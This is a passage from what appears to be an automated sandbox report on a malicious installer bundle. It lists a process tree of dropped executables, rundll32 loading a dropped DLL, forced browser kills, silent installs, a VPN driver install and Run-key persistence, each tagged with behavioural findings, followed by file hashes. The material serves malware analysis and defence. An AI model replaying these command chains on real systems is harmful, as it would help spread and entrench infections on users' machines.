                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:5204
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                              2⤵
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              PID:6120
                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                taskkill /f /im chrome.exe
                                                                                                                                                3⤵
                                                                                                                                                • Kills process with taskkill
                                                                                                                                                PID:7420
                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe
                                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"
                                                                                                                                            1⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                            PID:5156
                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                                            1⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:4248
                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                                                            1⤵
                                                                                                                                              PID:4948
                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                              1⤵
                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                              PID:6064
                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                2⤵
                                                                                                                                                  PID:6120
                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc
                                                                                                                                                1⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:4948
                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                1⤵
                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                PID:4012
                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                  2⤵
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  • Modifies registry class
                                                                                                                                                  PID:3500
                                                                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                                                                C:\Windows\system32\msiexec.exe /V
                                                                                                                                                1⤵
                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                • Enumerates connected drives
                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                • Modifies registry class
                                                                                                                                                PID:6492
                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 8931D92F8AACBAE4F549FB01F8F1E14B C
                                                                                                                                                  2⤵
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  PID:7540
                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 6D874DE1D9AA49E38C044B2E1AB9A458 C
                                                                                                                                                  2⤵
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  PID:5056
                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 0991A4F3F65A3AAEDB5A51E8EDFA5D1B C
                                                                                                                                                  2⤵
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  PID:8152
                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding D11AF07494F8C1E0E6DF1FB1266C91DE
                                                                                                                                                  2⤵
                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  PID:5392
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
                                                                                                                                                  2⤵
                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                  PID:9136
                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_8F32.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
                                                                                                                                                    3⤵
                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                    PID:8308
                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding F90427151319D7FDE92FCF9FE5DCCEC8
                                                                                                                                                  2⤵
                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                  PID:5196
                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                    3⤵
                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                    PID:8968
                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding B44D9C210DD3DBCE1B090210660B854A E Global\MSI0000
                                                                                                                                                  2⤵
                                                                                                                                                    PID:8720
                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                  1⤵
                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                  • Modifies registry class
                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                  PID:7080
                                                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                  1⤵
                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                  PID:156
                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                  c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                  1⤵
                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                  PID:6376
                                                                                                                                                  • C:\Windows\system32\DrvInst.exe
                                                                                                                                                    DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{65f3e057-a324-0649-99b5-c44ae3102c02}\oemvista.inf" "9" "4d14a44ff" "0000000000000164" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                    2⤵
                                                                                                                                                      PID:896
                                                                                                                                                    • C:\Windows\system32\DrvInst.exe
                                                                                                                                                      DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000178"
                                                                                                                                                      2⤵
                                                                                                                                                      • Drops file in Drivers directory
                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                      PID:7808
                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                    1⤵
                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                    PID:1312
                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                      2⤵
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      PID:6168
                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                    1⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:4032
                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                    1⤵
                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                    PID:896
                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                    1⤵
                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                    PID:7356
                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                    1⤵
                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                    • Modifies registry class
                                                                                                                                                    PID:6424
                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                    1⤵
                                                                                                                                                    • Modifies registry class
                                                                                                                                                    PID:7312
                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                    1⤵
                                                                                                                                                      PID:8584
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\A51C.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\A51C.exe
                                                                                                                                                      1⤵
                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                      PID:9076
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\DEDA.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\DEDA.exe
                                                                                                                                                      1⤵
                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                      PID:5828
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\E9C8.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\E9C8.exe
                                                                                                                                                      1⤵
                                                                                                                                                        PID:7028
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\F571.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\F571.exe
                                                                                                                                                        1⤵
                                                                                                                                                          PID:8084
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\66A.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\66A.exe
                                                                                                                                                          1⤵
                                                                                                                                                            PID:8324
                                                                                                                                                          • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                            "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                            1⤵
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                            PID:8492
                                                                                                                                                            • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                              MaskVPNUpdate.exe /silent
                                                                                                                                                              2⤵
                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                              PID:5168
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\4316.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\4316.exe
                                                                                                                                                            1⤵
                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                            PID:7060
                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                            1⤵
                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                            PID:8488
                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                              2⤵
                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                              PID:8568
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\8AFD.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\8AFD.exe
                                                                                                                                                            1⤵
                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                            PID:4560
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\9232.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\9232.exe
                                                                                                                                                            1⤵
                                                                                                                                                              PID:8112
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\B962.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\B962.exe
                                                                                                                                                              1⤵
                                                                                                                                                                PID:6320
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Setup.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
                                                                                                                                                                  2⤵
                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                  PID:6764
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\InfoPDF.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\InfoPDF.exe"
                                                                                                                                                                  2⤵
                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                  PID:7028
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\InfoPDF.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\InfoPDF.exe"
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:8880
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Whiskery.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Whiskery.exe"
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                    PID:3056
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Whiskery.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\Whiskery.exe
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:7652
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\C078.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\C078.exe
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                    PID:6624
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\C078.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\C078.exe"
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:2412
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\C078.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\C078.exe"
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:8956
                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:7176
                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:8688
                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:7860
                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                              PID:2268
                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:8176
                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                PID:7960
                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:8232
                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                  PID:2732
                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:1384
                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                    PID:6388
                                                                                                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                    PID:8108
                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                    PID:5288
                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:4332
                                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                      PID:7636
                                                                                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:4480
                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                        PID:1908
                                                                                                                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                                                        PID:2028
                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                        PID:8744
                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:7324
                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                          PID:5876
                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                          PID:8072
                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                          PID:1784
                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                          PID:6248
                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                          PID:7544
                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:8680
                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                            PID:2156
                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                            PID:8564
                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                            PID:1912
                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                            PID:8320
                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                            PID:5716

                                                                                                                                                                                          Network

                                                                                                                                                                                          MITRE ATT&CK Enterprise v6

                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                          Downloads

                                                                                                                                                                                          • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                            MD5

                                                                                                                                                                                            9499dac59e041d057327078ccada8329

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            707088977b09835d2407f91f4f6dbe4a4c8f2fff

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            ca607b3f03dd62f3ac9648087f30f502540be9944ef38b3ca622c2b9bcef06b9

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            9d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397

                                                                                                                                                                                          • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                            MD5

                                                                                                                                                                                            9499dac59e041d057327078ccada8329

                                                                                                                                                                                            SHA1

